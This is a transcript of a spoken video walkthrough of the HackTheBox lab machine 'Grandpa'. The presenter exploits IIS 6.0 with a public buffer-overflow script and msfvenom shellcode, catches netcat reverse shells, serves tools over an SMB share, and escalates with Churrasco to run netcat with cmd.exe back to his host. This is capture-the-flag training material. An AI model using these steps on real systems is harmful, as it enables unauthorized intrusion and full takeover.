Hi there everybody, my name is Ali and today we will be going to do Grandpa from HackTheBox, and this one is an easy machine, and again I will be going to show you my own methodology how I will solve this machine. I have not prepared this video and I will be going to do everything in front of you. I will solve my error messages and do everything as possible. So this machine is an easy machine. There are very easy exploits. The versions are very low in this machine, and we will try to get a reverse shell by exploiting IIS 6.0. And when we're going to have an reverse shell, we will be going to have a privilege escalation vector. Again, that will be kernel exploitation. So that being said, let's jump in. So I already have started a machine and my IP address is 10.10.10.14. So I will start off with the nmap scan, nmap-a for aggressive scan, -v for verbosity, and then the IP address of the target, which is 10.10.10.14. So this can take some time to run. So I already have ran it. Looking at the results, we are having only port 80 open. Now the service running is HTTP and the version is Microsoft IIS HTTPD 6.0. Now whenever I see very low versions regarding Apache, IIS, and any other service, I always go for their exploit right away. So I can now try to go to Google and I can say, do I have any exploit for IIS HTTPD 6.0? And normally now in 2023, I would highly recommend you that you look for exploits on Google and make sure you look for the exploits on GitHub, because those ones are much more good to go. We can also use a searchsploit as well. So if I use searchsploit, I will be going to see the exploits from exploit.db, and normally they will be quite outdated. Some might work, some might not work. So the better thing is that we should look for the latest exploits on GitHub. So the next thing is HTTP title says under construction. We are having HTTP web dev scan, and right here I can see that allowed methods are options, get, trace, get, head, copy, then this one search, log, unlock, then public options, options, trace, get, head, delete, put, post, copy. So I am having some dangerous methods here as well. So delete, put, post. So what I can try to do over here is I will be going to look for that if I can somehow upload files on the server using a put method. So if I can put files onto a server, I can execute directly and I can upload a reverse shell. I can execute my reverse shell and I will get an easy reverse shell. So since the technology is Microsoft IIS, this is a Windows machine. So I will be going to upload ASP or ASPX exploit. So right here again, supported methods, head, copy, search, log, unlock, delete, put, post, and right now risky methods again. So this is all about our nmap scan. We are having only one port open. So let's directly jump over to the browser and let's see what we are having over onto this side. So this site says under construction. I can see the page source. Now right now I am not having Webalizer extension. I will always try to look at the technology using Webalizer and all of the other things. So right here I cannot see anything interesting in the page source as well. If you are the website administrator, okay, so that's the same thing and nothing interesting over here. So whenever I see these things, nothing interesting, static site, I always go for directory brute forcing. Now for directory brute forcing, nowadays there are a lot of tools. So we are having Gobuster, we are having dir search, we are having Buster, we are having fuff. So the best one which I like normally is fuff, and for HackTheBox machines I normally use Gobuster. So it depends upon you which one you like to use. So because I like fuff because I can do fuzzing anywhere, so right now I will be going to use Gobuster, and I will also show you the syntax as well for both of this. So Gobuster dir -u for URL, I will paste the URL and then I will specify the word list, which is user share word list dirbuster directory list 2.3 medium.txt. And for extension, since this is a Windows machine, I will go for ASP and ASPX. Now for extension, I believe the flag is -x, and I will do .asp comma ASPX ASPX, and then I will go for .txt as well, because sometimes there might be any file like robots.txt. I can manually enumerate that file as well, but that's fine if we do that one. So right here, let's see what do we got here. So I can also manually try to go for here robots.txt, and it says the page cannot be found. If I do any random thing right over here, let's see what is the error message. Again the same error message. page cannot be found. So right now I'm not having anything interesting over here. So what I will be going to do is, okay, I am having images, but normally images will not be interesting. So if I do 10 10 10 14 slash images, directory string denied. So can I do something sort of local file inclusion over here somehow? Dot slash? No. Can I do something sort of dot semicolon slash? Nothing works. So that is fine. Now what I'm going to do is, let's come back to our Nmap scan again, and in the Nmap scan I will try to look for the exploits for IIS 6.0. So let's come to the browser. I will say IIS 6.0 exploit, and looking at the exploit, I am having rapid 7, which is normally metasploit. Okay, so we are having an exploit from metasploit rapid 7. Then I'm having, it says IIS 6.0 vulnerability leads to code execution. Then I'm having again exploit db as well, and this one is from 27 2017. Then we are having on GitHub this thing as well. So let's try to look on the GitHub as well, and I will also try to look for IIS 6 exploit, the exploit db one. Again, the other thing which I can do is I can come to my terminal and I can try to do searchsploit. So searchsploit, then I will do IIS 6, and let's see what we have over here. And we do have a lot of exploits. I will do 6.0 now. So I normally start off with the very small stuff, so IIS 6. So now I can see that, okay, there are 6.0 versions. So now I will do 6.0 because I don't know exactly whether there is 6 or 6.0. So my search can be gone wrong. So that's why I will look at the output first, and I will go for the specific search. So now this is a specific search which is 6.0, and now I'm having all of the exploit for 6.0. Now looking at all of these, let's see which one can be interesting. So first one is internal IP address, nothing interesting. Second one is Windows 2 FTP server, Windows 2000 remote stack overflow. Doesn't look interesting to me. Stack exhaustion, denial of service, out of the scope. Again, denial of service, not interesting. Denial of service. This one, remote buffer overflow. So the main thing about buffer overflow is that it should be remote because we are right now out of the machine. We don't have any executable file. We don't have anything. So the thing can be like, it should be remote because we are out of the machine. That's what remote means. So this can be interesting. Then remote authentication bypass, and all of these are authentication bypass. And right now I can see that I am not having any sort of authentication, any login page or anything. So looking at the results in the Gobuster, I still cannot see any login page, so that is fine. So let's try to download this exploit, which is remote buffer overflow. It is a Python code. So I will copy the path, then I will do, I believe, search exploit -m to mirror the exploit into my current working directory. If I do ls, there is the exploit, and 41738.py. So let's look at this one. So importing socket, then it is connecting to localhost 80. I will do 10.10.10.14 over here. Then it is trying to put the shell code, and this is the shell code which is right over here. Now I exactly have no idea what is the shell code over here. So if I can see in the help menu whether he is giving me any sort of shell code, how to make this shell code. Normally this shell code will be made through MSF Venom, but this exploit looks very difficult to read because I have exactly no idea which shell code is this one. Because if I'm using the exploit of any other person or from GitHub or from exploit db, I should exactly follow his instructions, but right now I cannot see anything right over here. So that will be a bad choice for me if I run this one, because if I need to get a reverse shell, I should have my local IP and local port in the shell code, and again I exactly have no idea how to make this shell code, so it will be very hard for me. So let's jump back over to the browser, and if I come back over here to GitHub one, okay. So GitHub one is also having the shell code over here. If I click on raw, let's zoom this up a little bit. Again, it is showing how to use this one. So usage is I need to run this exploit using python, target IP, target port, reverse IP, and reverse port. And again, in this one, I cannot see how to actually execute this shellcode, because this shellcode will not work as I am thinking right over here. So is there any command which will generate this shellcode for me or no? And doesn't look like. So let me see if this person has given some instructions on how to run this one or no. So if I come back over this one second. Again, this page. And doesn't look like that this person has also given me the command to generate the reverse shell. Yeah, exactly. So let's find someone else. So there is another one on GitHub. This one, let's see what is this. And looks like it is the same. So I believe now I need to do now manual thing or try to do some random stuff over here to generate this shellcode. And I exactly have no idea how should I do that one. So definitely I know that I will be going to use MSF Venom, but the command to generate that one differs in a lot of ways. So I don't know exactly whether this is x86 machine or x64 machine, so that will be a hard thing for me. So then let's try to do some then random things. Or the other thing which I am thinking is that it is asking us target IP, target port, reverse IP, and reverse port. So if I'm giving reverse IP over here and reverse port over here, so might be possible that he is giving us a reverse shell directly right over here. So let's try this exploit. So I will just click on raw, I will click on the link, I will come to my terminal and I will say wget, paste the link over here, and I will hit enter. So if I do ls, there is that exploit. I will just rename this exploit to, let's say, shell.py or any other random thing. So if I do move IIS to, let's say, shell.py. So if I open this shell.py, okay, now to run this, I need to do this thing, target IP, target port, reverse IP, and reverse port. So that looks easy. So if I do python and I will do shell.py, target IP is 10.10.10.14. Then target port is 80, my local IP is 10.10.14.11. I can see at the top, or you can do ifconfig as well to see that one, internal 0. And then I will be going to do, let's say, 443. I normally recommend 443 because it can bypass firewalls protection if there are. So let's try to start a netcat listener as well. So netcat dash nvlp 443, enter, and below enter now, and I am having syntax error. I believe that my shell is normally python 3 by default because I'm having parenthesis error. So normally that's the python version difference. So if I do python 2 and if I hit enter now, and let's see what happens now. Something did happen, but looks like I didn't got a, oh, I do got a reverse shell. Okay, so this was actually the easiest exploit which I saw right over here, and I was not aware about that one. So if I do who am I am anti-authority service. So doing this thing was worth. So that's what your enumeration should be. If you are finding anything on GitHub, if you're finding anything on exploitdb, try to do things which you are not expecting. So I was actually not expecting this thing because when I saw the shellcode in my exploit, I thought that this shellcode should be made by myself, but I don't know which command will help me to do this all thing. So that was the main difficult part for me right over here, and I was not aware of this thing. So before going to the privilege escalation part, there was one more thing which we left over here, and that was if I come back to my Nmap scan, in my Nmap scan, I saw that there were some options. So I told you that I can put files onto the server, post file onto the server. So just to confirm this thing, just to confirm, there is a tool in Linux that is called davtest. So what I can do over here is that I can come to my terminal and I can, let's open a new terminal, and I can do davtest over here, and in davtest I can simply do http://10.10.14. And what this will do is this will try to upload different file extensions onto the server. So for example, this is a Windows machine, so I want to see that whether I can upload ASP, whether I can upload ASPX, or whether I can upload any random txt file, or I can, by uploading a txt file, I can rename the txt file to ASP, or those sort of things. So this is a tool that will help us. And I think so I'm doing something wrong. I think so I need to put the minus URL flag. So let's do one more time, dash URL, hit enter now, and let's see. So now it is trying to upload files. So it is putting SHTML fail, JHTML fail, CGI fail, ASP fail, and all of these are getting failed and I cannot upload any file. So just a easy way actually to find, you can say, that whether I can upload files and try to get a reversal in that way, and in this case it fails. Okay, so the other one now if you want to actually utilize exploit db, so let's try to go for that exploit db as well. So if I do 41738, now this exploit db is quite hard, because in this one, if I somehow do over here 10 10 10 14, but most probably, oh, let's try to see on the browser whether I'm having on exploit db the same one. Yeah, looks like I'm having the same exploit over here as well. And since this is written in Python, so why not trying to craft my own shellcode, and I will put my own shellcode right over here. So let's try to do that one, and let's try to get a reverse shell from here as well, because I want to try this as well. So what I will do is I will try to generate my own shellcode using MSF Venom. So MSF Venom, so dash p for payload, and it will be Windows. Now I'm doing this on my own. I have exactly no idea what exploit is required in that script, but I will be going to do Windows shell underscore reverse underscore TCP. Now if you don't know how I figured this out, actually this is based upon my experience, but if you are just a beginner, you can go to a website called refshells.com, and you can try to get commands from this website actually. Right over here you can just put your IP, which is 10.10.14.11, your local IP, your local port 443. Then you can click on MSF Venom, and right here you will see all of the commands. So this says MSF Venom dash p Windows x64 meterpreter reverse TCP. So again, using these payloads are the one, or you can also do MSF Venom dash list payloads to actually see the payloads, or you can come to this side. There are a lot of ways to figure out MSF Venom commands or these sort of things. You can go for cheat sheet. So the one which I am using right now over here is this one. So MSF Venom dash p Windows x64 shell reverse TCP. Now again, I have exactly no idea that my system is 64-bit or 32-bit, so that's why I am doing shell reverse TCP only. Okay, so this is a staged payload. I am doing stageless payload. It will be normally this one, like this, shell underscore reverse underscore TCP, and localhost, local port, and so on. So let's copy this from here just to make things much more easy. So I'll paste like this, and reverse.exe. So normally I don't want executable file, because I need to put my script in Python script. Sorry, I need to put my shellcode in Python script. So I will do dash f, and I will say the format will be Python. That's all. So 10 10 14 11 Windows shell reverse TCP 443, enter now, and most probably I will get a Python shellcode. So this is now what I will be going to test to see whether I can get a reverse shell or no. And I got a shellcode in my buff variable. So what I can do now is I can copy this all, come back to the script, and in the shellcode variable I will put it over here. So shellcode is equal to, or let's move this shellcode variable. Or one more thing which I could have done is that because it is taking a shellcode variable, so I should have removed my variable name to shellcode, because my variable is buff right over here, right? So it is taking shellcode because it is using shellcode everywhere, shellcode over here as well. So I change the shellcode variable to buff variable right over here and right over here, or I can also do one more thing in the same command. If I do -v and if I say shellcode, it will make our payload in the shellcode way. So it will make remove the variable buff and it will add shellcode. So let's see if it works over here or no. And there you go. So you can see now it has changed our shellcode. So now I can just simply copy paste this one, copy, remove this shellcode, paste this shellcode, save now, and now it's time to run our shellcode. So 10 10 10 14 80, and my shellcode is there, shellcode is over here, save, and let's start a listener again. So I will actually do this over here. So if I do python, I think so python 2 is good to go. This one, start a listener again. So netcat dash nvlp 443, enter. Let's hit enter above, and 400 byte request. So looks like it did the same thing just like was doing in my GitHub exploit. So everything looks fine and same, and in the end I think so I got over here, one second, I got over here 200 okay, or I didn't got any response, but right over here I'm having 400 bad requests. So something is definitely wrong. So this fails actually. I don't know exactly what is the correct thing. 400 bad request is not giving us anything. So, or we can try any other exploit, the other things, but the GitHub one works. So in this way we can try some other exploits, try changing the exploits. I can either do x64 over there in the shellcode, and this is all hit and trial method. So I just wanted to show you how you should go when you are solving a machine. It's not about that, okay, I have got a reverse shell and that's all. So you need to figure it out, that what sort of things you have done, how things are going on, how the shellcode is working and everything. So now I am having a reverse shell. One more thing which I can show you right over here is that if I control C my reverse shell right over here, and if I start my netcat again, one thing which I can do is that I can get a little bit of stable reverse shell by doing read line wrap behind that one, and I think so I am not having installed that one. So I'll do apt install read line wrap over here, and it will get installed. And it is done. So now what it will do is it will make my shell a little bit stable. So for Windows machines I normally do this one because that is very important. I don't want to mess my commands and those sort of things. So now if I do something sort of, again, read line wrap netcat dash nvlp 443, and now if I get my reverse shell again, and this time I'm having 500 internal server error, so that is fine. Let's try one more time. Again 500 internal server error. So I think so I have messed up the machine somehow. Now I'm not getting a reverse shell. So that might be possible because I ran that exploit and that's why it is not working. But I am confirmed over here that it should work. So I will going to pause the video right over here, and I will again either reset this machine or somehow wait for some time, and then I will get a reverse shell again. Okay, so I'm back, and again what I did was I restarted the machine, reset the machine, and now I ran the exploit again and I got a reverse shell. And this time I'm having read line wrap over here, so which means that now my shell will be stable. So for example, if I'm typing anything random, you will notice that in my normal shell I cannot come back, but now I can use my arrow key and you can see I can move my cursor left and right. So this is the benefit of read line wrap. I can do all of the things. So now let's jump over to the privilege escalation section. Now first thing first, I will type in who am I. It says anti-authority service. Now my privilege escalation methodology is doing manual things in the beginning, then run winpace, then run powerup.ps1 PowerShell script which gives us the privilege escalation vectors, and then so on. So now I will do who am I, that is network service. So I am having a service account right over here. Then I can do something sort of who am I / all, hit enter, and I am having some privileges right over here. Then I am having some groups here as well. Let's see the privileges, and I can see that I am having SC impersonate privilege enabled as well. So this can be a juicy potato exploit, or this can be a print spoofer exploit, but I exactly don't know which one will work because it depends upon the system information. So if I do system info and hit enter, let's see what we are having over here. So grandpa, and it is Windows Server 2003. Now based upon this one, I am assured that this is very hard, because on Windows Server 2003 the juicy potato will not work and print spoofer will not, because those are above these versions. So normally I am assuming right over here that exploiting SC impersonate privilege on this machine cannot be possible. I will have definitely an error message. So the next thing what I can try to do is kernel exploit. Now there are again two ways to go for the kernel exploits, and that is either I use Windows exploit suggester, or I try to do random things manually, because Windows exploit suggester does also gives us a lot of kernel exploits, and we need to go for the hit and trial method. So let's try to see which one will work. So if I try to download Windows exploit suggester somehow, if I do let's go to Google. So Windows exploit suggester. Now my Linux is actually quite updated, and the latest one, I don't know whether this 8 years old script will work onto my system or no. So but let's try. So I will git clone Windows exploit suggester, done, cd into Windows exploit suggester, and if I do python to Windows exploit suggester, because looks like it is quite old, initiating win exploit and error occurred, no enough arguments. So let's see how to use this one. Okay, I need to run first of all update to actually download the database file, because what it does is that we pass system info file to this exploit suggester, and based upon its database it will show us that hey, this kernel version is vulnerable to these sort of exploits. So let's try that one. So now what I will do is I will do python to Windows exploit suggester, and then I will do -- update, enter, done, and I have my database file. Now I only need my system info file, so that is easy. What I can do is I can simply copy my system info output from over here, copy, and I will make a file called, let's say, system info grandpa.txt, paste my system info over here, save, and now I will simply follow the instructions over here that what I need to do. So I need to run -- database, then the database file, -- system info, then the system info file. So python to Windows exploit suggester -- database file is this one, and then -- system info file is this one, and let's hit enter, and it says an error message: database file detected as XLS or XLSX based on the extension. Please install and upgrade python-xlrd library. So let's try to do pip install, whether this works. Not works. If I do python 2 -m pip install, no module name pipped. So if I do pip 2 No, pip2 is not there as well. So I need to fix this error as well. So let's see how can I fix that. So doing a lot of research, I googled the error message on here and I got this GitHub repository again on the Windows exploit suggester repo, and right here again some people are also having this error message. So it says this fix worked over here, and if I scroll down it says you need to wget this get pip file. So wget this thing. So let me wget this quickly. So let's come to my terminal, paste, enter, and let's see what he's doing next. So he's doing run the file with python 2. So let's run the file with python 2 and let's save this fix. So let's see what happens now. I think so it is trying to install pip version 2 most probably, and done. Then it is saying python get pip. Okay, I already have done that one. Install xlrd. So python-m pip to install this thing. So let's see if this works. I think so I need to do python 2 because in the latest version of Kali it is by default 3. So if I hit enter now, no module name pip2. If I do python 2.7, no module name pip2. If I do python 3, no module name pip2. So I think so I need to do something sort of python 2. Let's see if this works, and looks like it did work. Okay, so I just needed to do pip, not pip2. So again, that's all. So let's try to run our command again. So this one was this one, and if I hit enter, and looks like that our error message got fixed. So actually this Google search helped me a lot. So let me show you what I did on Google. I just copy pasted the error message over here. I went to the first GitHub post, and the first GitHub one was this one. So again I followed these instructions, and now there you go. I have all of the exploits which are working for me. So now these are huge. These are very huge. And again, this is based upon your manual exploitation, and all these things are manually because this thing is very hard. You need to try each and every exploit because you can see it is showing us every exploit: ms15051, ms15010, ms141070, and so on till the end. Now I am exactly not sure which one will work, which one will not work, and doing all these is a very painful task. So the other thing which I can do is, because I will not go for all these, either I can choose any one of these, but I don't know which one to choose. So what can I do is, if I come back to my Windows shell, if I Google this, that will help. Let's see. So if I Google and if I say exploit, let's see what we got. So ms11046 is over here. Then a lot of things are over here. We can try to run this one then. ms11046. Let's see, our Windows Explorer suggester gave us ms11046. Yes. ms11, no. So Windows Explorer suggester is saying it is not vulnerable to that one. So now I don't know exactly whether we can try that one or no, but trying is the best thing. So let's try. So ms11-046. I will go for exe file. I don't want to compile the code myself. So right here somewhere I will be going to have any exe file. Let's see, ms11046, and there it is, ms11046.exe. Now I will be going to give you a very important step right here, how to run these sort of files. So it contains a virus. I know, just allow it. So allowed. Now let's come back over to here onto my Windows machine. I will come out of Windows Exploit Suggester and I will move that from my root downloads folder to over here. So ms11 into my current working directory. There it is. And To run this, either I can transfer this file over to here, but I will not suggest you to do this on old Windows machines. That is a very bad choice. If you are transferring this file over here and executing it over here, that is a very bad choice when especially you are having very old Windows machines. So what to do? The easiest way to do that one is start an SMB server and run the file through SMB server. And how to do that one, let me show you. So to start an SMB server, we do impacket dash smb server, and I will do smb to support. Now I don't think so it is required because this is very old machine. Then I will start a share. Let's call the share name share, and then I will say I need to host my current working directory, which is $pwd, or I can give the full path, but I will not give the full path. And looks like that's all. I will hit enter and my smb server is started. Now to this Windows machine, I will try to come out into users. I also forgot to grab the flag. So cd into, let's go into inpub, or I can do this thing anywhere. So www root. There are a lot of interesting things over here. I can see admin scripts folder over here as well, but let's try to do all things over here in www root. So I will say net use, then I will call my share name, which is 10.10.14.11/share, like this. So I will say I want to connect to this share, which is I have started onto my Kali machine. So if I hit enter, I got an authentication over here and it says command completed successfully. Now I am having an error message, most probably SMB2 negotiation, because I told you SMB2 might not work. So I can also remove the flag, but I think so command completed successfully. So now I can directly try to run that thing. So what I can do is I can do this thing 10.10.14.11. Then the file is present in my share directory, and in share the file name is, I just forgot. So the file name is ms11.046.exe. Hit enter now, and let's see whether we got a system access here or no. So done, and ms11 cve by this time identifying OS 32 unsupported version, looks like didn't work. If I type in who am I, no, it didn't work. So ms11.046 didn't work. Now again, that's a problem for me. So now based upon this one, that is a very huge research, a very huge one. So I will just save my time based upon doing a lot of research. And the exploit for this one that will work is called Churascco. This one. So now I can also say GitHub exploit, because this one is an exploit for privilege escalation, and this works actually on lower machines as well. Again, how I noticed that one, that is a lot of research regarding this one. So it says Microsoft Windows XP Vista 2003 2008 WMI service isolation local privilege escalation vulnerability. Now one more thing which how I noticed that one was that if I come back over here on my Windows dir, you can see I'm having wmpub. So if I do cd into wmpub again, and it's not a good choice, but wmiis log. So again, it is saying WMI service isolation local privilege escalation vulnerability. So this can be a Google search as well, and especially when you are doing OSCP, I would highly recommend you that you should do these sort of searches as well. Like copy this file, go to Google, do this thing and say privilege escalation. This will definitely help you in your OSCP and those sort of things. So Windows Linux privilege escalation and those sort of things, you might find any exploit somewhere. So again, this is a very huge research. So right here it says that we are having churascco.exe git executable file over onto this page. So let's paste this link over here and it downloads. So I need to learn how to run this as well because I have exactly no idea. So let's go to his GitHub repository. And onto his GitHub repository, he is not showing us how to run this one. There is no releases as well. So let's see how to do this thing manually. So again, I have downloaded it again in the same way. I will do that one because this is a very old machine. So I will move /root downloads Churascco into my current working directory, And now again I already have done that command NATU, so no need to do it again and again, and I will simply do the previous command which I did. So it was this thing, and instead of MS11 I will run Churascco from my Kali machine. So copy, paste, and hit enter, and let's see what it does. Access is denied. So normally I cannot do that over here. If I again cd into inet pub and cd into www root, now if I do the same command, enter, access is denied. So now again this thing is causing access is denied. So what I can do now is let's try to go into any other one. Dir, it should work on wmp pub. Let's see permissions. To see the permissions on wm pub, I can do icackles wm pub, and built-in users have read and execute, and I am having read and execute over here, but let's cd into wmpub, or if it is not working, let's try to download this file from our SMB server. So I can do one more thing. So I can say copy. So in the same command which I am doing, rather executing, I can copy it. So copy this file to my current working directory, enter now, and access is denied. So I can try to copy it somewhere else. Let's do cd dot dot. I need to find a way where I can copy. So if I cd into inet pub, cd, let's do icackles inet pub, again read and execute. So cd into inet pub, dir, cd into www root, dir, and if I do download that file over here, so if I copy this thing into my current working directory, access is denied. So I need to find another place. So to find another place, I can go into documents and settings. Let's see whether I can do that thing in over here, dir, and I can go into Harry user. Let's see if this works. Access is denied. If I go into all users, dir, can I do that thing over here? So copy my file over here, access is denied. So I need to figure out how I can upload this file. So the other thing which I can try to do is, let's come out of all these directories. I exactly have no idea why it is not working, but if I do, let's try to do anything. So echo test into test.txt, enter, dir. Oh, I do have my test file over here. So why I can, if I can write into this file, why I cannot copy files over here? That is strange. So if I type test.txt, yes, I can do that one. So I think so SMB2 sport is causing problem from my side. If I remove SMB2 sport, enter. Okay, my server is on. So if I do NAT use 10, 10, 14, 11, share, enter, command completed successfully. So if I now copy Churascco from that over here, enter. Oh, it did work. So again, that I told you that like this thing causes problems, which is SMB2 sport, because this is a very old Windows machine. So now it actually did work, and there is my churasco.exe file. So that's how you do debugging and all of the things, and this is a hard process. So if I do -h for help how to use this exploit, it is not recognized. So okay, I got a help menu. So usage is churasco.exe-d and then the command to run. So that is fine. So -d, and if I type in who am I, And there you go, I am anti-authority system. So my commands are working over here. The next step will be getting a reverse shell. And to get a reverse shell, the best thing which I like to do is using netcat. So what I will do is onto my system, I will locate netcat.exe binary. You can download it from GitHub as well. So I will copy it from my this directory into my current working directory. Again, I will transfer netcat using the same technique. So copy this thing from my SMB share netcat.exe into my current working directory. Copy will work in this case as well. Done, dir. There it is. So now if I do churascco.exe -d, and the command which I will run is netcat.exe -execute cmd.exe, which is a very famous and basic reverse shell onto my local machine 10.10.14.11 on port 443. So if I start a netcat listener over here on 443, again I can do read line wrap over here, hit enter, listener is on. Let's run Churascco, and netcat.exe is not recognized as internal and external command. Maybe I'm not giving the full path, so I can do dot slash, I believe. No, if I do dot backslash, otherwise I need to give the full path. No, so let's give the full path, which is it is present in my C drive this directory. So if I do C drive this directory and then hit enter now, I should get a reverse shell. And there you go. If I type in who am I am anti-authority system. So that was the box. Actually it was a very hard and difficult because the machine is quite old. So if I go into my, normally to grab the flag we need to go into users, or in the old machines there is documents and settings, dir. Then I can go into administrator, desktop, and type root.txt, and here is the root flag, and cd into I believe Harry, dir, cd into desktop, dir, and there is the user flag. So that was all about this box. It was a quite annoying box because this was an old Windows machine, and you learned a lot of things, how to debug things, how to do all things possible, Windows Explorer Suggester and my Windows methodology. So that was all about this video. Hopefully you will like it, and I will see you in the next video. Take care. Bye.